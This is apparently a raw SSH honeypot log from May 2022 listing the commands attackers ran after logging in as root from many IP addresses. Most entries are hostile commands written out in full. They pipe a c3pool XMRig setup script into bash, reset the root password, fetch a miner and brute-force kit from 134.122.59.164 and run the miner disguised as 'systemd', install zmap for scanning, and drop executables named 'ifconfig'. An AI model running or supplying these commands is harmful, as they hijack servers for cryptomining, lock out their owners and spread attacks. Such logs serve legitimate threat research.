18-May-2022 02:02:36 ssh2 root Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig From 78.92.170.193 18-May-2022 02:22:05 ssh2 root Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig From 179.43.142.180 18-May-2022 02:53:43 ssh2 root Exec echo root:dgtij24jti3u3ji4rgg|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA echo root:dgtij24jti3u3ji4rgg|chpasswd|bash lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 121.200.53.148 18-May-2022 02:54:41 ssh2 root Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig From 54.38.188.38 18-May-2022 02:55:41 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig From 179.43.142.180 18-May-2022 03:00:56 ssh2 root Exec echo root:dgtij24jti3u3ji4rgg|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA echo root:dgtij24jti3u3ji4rgg|chpasswd|bash lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA From 85.105.58.118 18-May-2022 03:09:02 ssh2 root Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 175.178.251.145 18-May-2022 03:13:26 ssh2 root Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 107.173.84.130 18-May-2022 03:17:43 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig From 185.135.232.174 18-May-2022 03:25:16 ssh2 root Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig From 109.236.63.188 18-May-2022 03:28:44 ssh2 root Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 118.195.235.49 18-May-2022 03:29:15 ssh2 root apt install -y zmap || yum install -y zmap || dnf install -y zmap Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig From 92.205.21.38 18-May-2022 03:29:22 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 apt install -y screen || yum install -y screen || dnf install -y screen screen -S 'auto' ./loop From 178.62.216.128 18-May-2022 03:32:43 ssh2 root Exec curl -O http://134.122.59.164/systemd && curl -O http://134.122.59.164/banner.log && curl -O http://134.122.59.164/bios.txt && curl -O http://134.122.59.164/bone && curl -O http://134.122.59.164/brute && curl -O http://134.122.59.164/hrdmv1 && curl -O http://134.122.59.164/loop && curl -O http://134.122.59.164/mfu.txt && curl -O http://134.122.59.164/motd && curl -O http://134.122.59.164/pass_file || wget http://134.122.59.164/systemd && wget http://134.122.59.164/pass_file && wget http://134.122.59.164/motd && wget http://134.122.59.164/mfu.txt && wget http://134.122.59.164/loop && wget http://134.122.59.164/hrdmv1 && wget http://134.122.59.164/brute && wget http://134.122.59.164/boner && wget http://134.122.59.164/bios.txt && wget http://134.122.59.164/banner.log && chmod 777 * && bash -c './systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX' || ./systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX && apt install -y zmap || yum install -y zmap || dnf install -y zmap && apt install -y screen || yum install -y screen || dnf install -y screen && screen -S 'auto' ./loop curl -O http://134.122.59.164/systemd curl -O http://134.122.59.164/banner.log curl -O http://134.122.59.164/bios.txt curl -O http://134.122.59.164/bone curl -O http://134.122.59.164/brute curl -O http://134.122.59.164/hrdmv1 curl -O http://134.122.59.164/loop curl -O http://134.122.59.164/mfu.txt curl -O http://134.122.59.164/motd curl -O http://134.122.59.164/pass_file || wget http://134.122.59.164/systemd wget http://134.122.59.164/pass_file wget http://134.122.59.164/motd wget http://134.122.59.164/mfu.txt wget http://134.122.59.164/loop wget http://134.122.59.164/hrdmv1 wget http://134.122.59.164/brute wget http://134.122.59.164/boner wget http://134.122.59.164/bios.txt wget http://134.122.59.164/banner.log chmod 777 * bash -c './systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX' || ./systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 120.236.78.194 18-May-2022 03:32:56 ssh2 root apt install -y screen || yum install -y screen || dnf install -y screen screen -S 'auto' ./loop Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 52.131.32.110 18-May-2022 03:33:56 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 120.236.78.194 18-May-2022 03:34:04 ssh2 root Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig apt install -y screen || yum install -y screen || dnf install -y screen screen -S 'auto' ./loop From 178.62.216.128 18-May-2022 03:35:02 ssh2 root Exec curl -O http://134.122.59.164/systemd && curl -O http://134.122.59.164/banner.log && curl -O http://134.122.59.164/bios.txt && curl -O http://134.122.59.164/bone && curl -O http://134.122.59.164/brute && curl -O http://134.122.59.164/hrdmv1 && curl -O http://134.122.59.164/loop && curl -O http://134.122.59.164/mfu.txt && curl -O http://134.122.59.164/motd && curl -O http://134.122.59.164/pass_file || wget http://134.122.59.164/systemd && wget http://134.122.59.164/pass_file && wget http://134.122.59.164/motd && wget http://134.122.59.164/mfu.txt && wget http://134.122.59.164/loop && wget http://134.122.59.164/hrdmv1 && wget http://134.122.59.164/brute && wget http://134.122.59.164/boner && wget http://134.122.59.164/bios.txt && wget http://134.122.59.164/banner.log && chmod 777 * && bash -c './systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX' || ./systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX && apt install -y zmap || yum install -y zmap || dnf install -y zmap && apt install -y screen || yum install -y screen || dnf install -y screen && screen -S 'auto' ./loop curl -O http://134.122.59.164/systemd curl -O http://134.122.59.164/banner.log curl -O http://134.122.59.164/bios.txt curl -O http://134.122.59.164/bone curl -O http://134.122.59.164/brute curl -O http://134.122.59.164/hrdmv1 curl -O http://134.122.59.164/loop curl -O http://134.122.59.164/mfu.txt curl -O http://134.122.59.164/motd curl -O http://134.122.59.164/pass_file || wget http://134.122.59.164/systemd wget http://134.122.59.164/pass_file wget http://134.122.59.164/motd wget http://134.122.59.164/mfu.txt wget http://134.122.59.164/loop wget http://134.122.59.164/hrdmv1 wget http://134.122.59.164/brute wget http://134.122.59.164/boner wget http://134.122.59.164/bios.txt wget http://134.122.59.164/banner.log chmod 777 * bash -c './systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX' || ./systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig From 160.120.129.184 18-May-2022 03:35:09 ssh2 root apt install -y zmap || yum install -y zmap || dnf install -y zmap Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig From 150.107.95.20 18-May-2022 03:35:31 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig From 178.62.216.128 18-May-2022 03:39:47 ssh2 root Exec curl -O http://134.122.59.164/systemd && curl -O http://134.122.59.164/banner.log && curl -O http://134.122.59.164/bios.txt && curl -O http://134.122.59.164/bone && curl -O http://134.122.59.164/brute && curl -O http://134.122.59.164/hrdmv1 && curl -O http://134.122.59.164/loop && curl -O http://134.122.59.164/mfu.txt && curl -O http://134.122.59.164/motd && curl -O http://134.122.59.164/pass_file || wget http://134.122.59.164/systemd && wget http://134.122.59.164/pass_file && wget http://134.122.59.164/motd && wget http://134.122.59.164/mfu.txt && wget http://134.122.59.164/loop && wget http://134.122.59.164/hrdmv1 && wget http://134.122.59.164/brute && wget http://134.122.59.164/boner && wget http://134.122.59.164/bios.txt && wget http://134.122.59.164/banner.log && chmod 777 * && bash -c './systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX' || ./systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX && apt install -y zmap || yum install -y zmap || dnf install -y zmap && apt install -y screen || yum install -y screen || dnf install -y screen && screen -S 'auto' ./loop curl -O http://134.122.59.164/systemd curl -O http://134.122.59.164/banner.log curl -O http://134.122.59.164/bios.txt curl -O http://134.122.59.164/bone curl -O http://134.122.59.164/brute curl -O http://134.122.59.164/hrdmv1 curl -O http://134.122.59.164/loop curl -O http://134.122.59.164/mfu.txt curl -O http://134.122.59.164/motd curl -O http://134.122.59.164/pass_file || wget http://134.122.59.164/systemd wget http://134.122.59.164/pass_file wget http://134.122.59.164/motd wget http://134.122.59.164/mfu.txt wget http://134.122.59.164/loop wget http://134.122.59.164/hrdmv1 wget http://134.122.59.164/brute wget http://134.122.59.164/boner wget http://134.122.59.164/bios.txt wget http://134.122.59.164/banner.log chmod 777 * bash -c './systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX' || ./systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 117.80.212.33 18-May-2022 03:39:53 ssh2 root apt install -y zmap || yum install -y zmap || dnf install -y zmap Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 178.62.216.128 18-May-2022 03:40:59 ssh2 root Exec curl -O http://134.122.59.164/systemd && curl -O http://134.122.59.164/banner.log && curl -O http://134.122.59.164/bios.txt && curl -O http://134.122.59.164/bone && curl -O http://134.122.59.164/brute && curl -O http://134.122.59.164/hrdmv1 && curl -O http://134.122.59.164/loop && curl -O http://134.122.59.164/mfu.txt && curl -O http://134.122.59.164/motd && curl -O http://134.122.59.164/pass_file || wget http://134.122.59.164/systemd && wget http://134.122.59.164/pass_file && wget http://134.122.59.164/motd && wget http://134.122.59.164/mfu.txt && wget http://134.122.59.164/loop && wget http://134.122.59.164/hrdmv1 && wget http://134.122.59.164/brute && wget http://134.122.59.164/boner && wget http://134.122.59.164/bios.txt && wget http://134.122.59.164/banner.log && chmod 777 * && bash -c './systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX' || ./systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX && apt install -y zmap || yum install -y zmap || dnf install -y zmap && apt install -y screen || yum install -y screen || dnf install -y screen && screen -S 'auto' ./loop curl -O http://134.122.59.164/systemd curl -O http://134.122.59.164/banner.log curl -O http://134.122.59.164/bios.txt curl -O http://134.122.59.164/bone curl -O http://134.122.59.164/brute curl -O http://134.122.59.164/hrdmv1 curl -O http://134.122.59.164/loop curl -O http://134.122.59.164/mfu.txt curl -O http://134.122.59.164/motd curl -O http://134.122.59.164/pass_file || wget http://134.122.59.164/systemd wget http://134.122.59.164/pass_file wget http://134.122.59.164/motd wget http://134.122.59.164/mfu.txt wget http://134.122.59.164/loop wget http://134.122.59.164/hrdmv1 wget http://134.122.59.164/brute wget http://134.122.59.164/boner wget http://134.122.59.164/bios.txt wget http://134.122.59.164/banner.log chmod 777 * bash -c './systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX' || ./systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig From 139.209.222.134 18-May-2022 03:41:06 ssh2 root Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig apt install -y zmap || yum install -y zmap || dnf install -y zmap From 118.41.204.72 18-May-2022 03:41:13 ssh2 root apt install -y screen || yum install -y screen || dnf install -y screen screen -S 'auto' ./loop From 31.19.237.170 18-May-2022 03:51:19 ssh2 root Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig From 178.62.216.128 18-May-2022 04:02:56 ssh2 root Exec curl -O http://134.122.59.164/systemd && curl -O http://134.122.59.164/banner.log && curl -O http://134.122.59.164/bios.txt && curl -O http://134.122.59.164/bone && curl -O http://134.122.59.164/brute && curl -O http://134.122.59.164/hrdmv1 && curl -O http://134.122.59.164/loop && curl -O http://134.122.59.164/mfu.txt && curl -O http://134.122.59.164/motd && curl -O http://134.122.59.164/pass_file || wget http://134.122.59.164/systemd && wget http://134.122.59.164/pass_file && wget http://134.122.59.164/motd && wget http://134.122.59.164/mfu.txt && wget http://134.122.59.164/loop && wget http://134.122.59.164/hrdmv1 && wget http://134.122.59.164/brute && wget http://134.122.59.164/boner && wget http://134.122.59.164/bios.txt && wget http://134.122.59.164/banner.log && chmod 777 * && bash -c './systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX' || ./systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX && apt install -y zmap || yum install -y zmap || dnf install -y zmap && apt install -y screen || yum install -y screen || dnf install -y screen && screen -S 'auto' ./loop curl -O http://134.122.59.164/systemd curl -O http://134.122.59.164/banner.log curl -O http://134.122.59.164/bios.txt curl -O http://134.122.59.164/bone curl -O http://134.122.59.164/brute curl -O http://134.122.59.164/hrdmv1 curl -O http://134.122.59.164/loop curl -O http://134.122.59.164/mfu.txt curl -O http://134.122.59.164/motd curl -O http://134.122.59.164/pass_file || wget http://134.122.59.164/systemd wget http://134.122.59.164/pass_file wget http://134.122.59.164/motd wget http://134.122.59.164/mfu.txt wget http://134.122.59.164/loop wget http://134.122.59.164/hrdmv1 wget http://134.122.59.164/brute wget http://134.122.59.164/boner wget http://134.122.59.164/bios.txt wget http://134.122.59.164/banner.log chmod 777 * bash -c './systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX' || ./systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX From 124.223.208.121 18-May-2022 04:03:02 ssh2 root apt install -y zmap || yum install -y zmap || dnf install -y zmap From 222.134.240.92 18-May-2022 04:03:10 ssh2 root Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig apt install -y screen || yum install -y screen || dnf install -y screen screen -S 'auto' ./loop From 173.19.149.215 18-May-2022 04:31:52 ssh2 root Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig From 185.135.232.174 18-May-2022 04:34:01 